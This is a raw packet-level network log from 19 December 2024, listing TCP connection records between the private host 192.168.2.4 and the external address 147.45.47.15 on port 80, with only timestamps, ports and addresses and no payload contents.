Dec 19, 2024 08:52:38.243444920 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.243477106 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.244216919 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.244232893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.244245052 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.244281054 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.245059967 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245073080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245085955 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245111942 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.245146990 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.245910883 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245923996 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245935917 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245949030 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.245974064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.246001005 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.246733904 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.246747017 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.246757984 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.246798038 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.247591972 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.247606039 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.247617006 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.247642040 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.247674942 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.248455048 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.248467922 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.248481035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.248492956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.248526096 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.248563051 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.249306917 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.249319077 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.249330997 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.249373913 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.250179052 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.250190973 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.250201941 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.250243902 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.250281096 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.251032114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251044989 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251055002 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251066923 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251092911 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.251111984 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.251897097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251910925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251929998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.251962900 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.252732992 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.252746105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.252758026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.252810955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.252854109 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.253608942 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.253623009 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.253634930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.253648043 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.253703117 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.253731966 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.254440069 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.254462004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.254476070 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.254528046 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.255320072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.255331993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.255343914 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.255388975 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.255418062 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.256135941 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.256169081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.256181002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.256192923 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.256212950 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.256241083 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.257015944 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257029057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257040977 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257087946 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.257869959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257882118 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257894039 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.257920980 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.257946014 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.258749008 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.258763075 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.258775949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.258790970 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.258825064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.258852959 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.259607077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.259620905 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.259633064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.259684086 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.260442019 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.260454893 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.260463953 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.260477066 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.260504961 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.260535955 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.261332989 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.261347055 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.261358976 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.261372089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.261399984 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.261436939 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.262196064 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.262208939 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.262221098 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.262268066 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.263001919 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.263015032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.263027906 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.263056040 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.263092041 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.263686895 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.263700008 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.263767958 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.264202118 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.264214039 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.264260054 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.264750004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.264763117 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.264821053 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.265232086 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.265244007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.265300035 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.265841961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.265853882 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.265908003 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.266334057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.266503096 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.266515017 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.266566038 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.267097950 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.267177105 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.267358065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.267369986 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.267630100 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.267795086 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.267807961 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.267854929 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.268330097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.268342972 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.268357038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.268389940 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.268661976 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.269124031 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.269177914 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.269309044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.269321918 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.269366026 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.269853115 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.269867897 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.269927979 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.270385981 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.270400047 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.270411968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.270445108 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.271136999 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.271148920 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.271162033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.271200895 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.271217108 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.271923065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.271935940 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272355080 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.272393942 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272406101 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272438049 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.272938013 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272948980 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272958994 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.272984028 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.273772955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.273785114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.273803949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.273818970 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.273863077 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.274615049 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.274627924 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.274672031 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.274995089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275006056 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275017023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275053024 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.275863886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275878906 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275887966 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.275957108 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.275966883 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.276704073 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.276716948 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277024031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.277059078 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277093887 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277106047 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277152061 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.277951002 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277965069 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.277972937 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.278086901 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.278932095 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.289717913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.342519045 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.342572927 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.342591047 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.342989922 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.343035936 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.343343973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.343364000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.343400955 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.344439030 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.344451904 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.344506979 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.345438957 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.345571995 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.345616102 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.346520901 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.346748114 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.346786976 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.347598076 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.347747087 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.347790956 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.348648071 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.348890066 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.348925114 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.349911928 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.349925041 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.349972010 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.350995064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.351167917 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.351236105 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.352077961 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.352484941 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.352535009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.353132963 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.353212118 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.353247881 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.354095936 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.354228973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.354290962 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.355151892 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.355350971 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.355415106 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.356252909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.356410027 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.356482029 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.357398987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.357476950 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.357517958 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.358464003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.358556986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.358705044 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.359548092 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.359639883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.359684944 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.360613108 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.360873938 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.360913992 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.361716032 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.361829996 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.361871004 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.362806082 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.362938881 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.363003969 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.363881111 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.364106894 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.364149094 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.365025997 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.365138054 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.365257978 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.366097927 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.366281986 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.366319895 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.366888046 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.367183924 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.367326975 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.367387056 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.368220091 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.368383884 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.368421078 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.369394064 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.369478941 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.369519949 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.370518923 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.370625973 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.370667934 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.371622086 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.371680021 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.371716022 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.372227907 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.372612953 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.372971058 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.373009920 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.373671055 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.373831987 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.373869896 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.374900103 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.374959946 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.374996901 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.375861883 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376055956 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376087904 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.376291037 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376362085 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.376471043 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.376519918 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376874924 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376885891 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.376924992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.377146959 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.377159119 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.377242088 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.377631903 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.377676010 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.377929926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.378155947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.378218889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.378433943 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.378444910 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.378493071 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.378953934 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.378969908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.379023075 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.379560947 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.379571915 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.379585028 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.379616976 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.380247116 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.380258083 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.380270004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.380302906 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.380321980 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.381117105 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.381129026 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.381172895 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.381572008 CET	80	49731	147.45.47.15	192.168.2.4
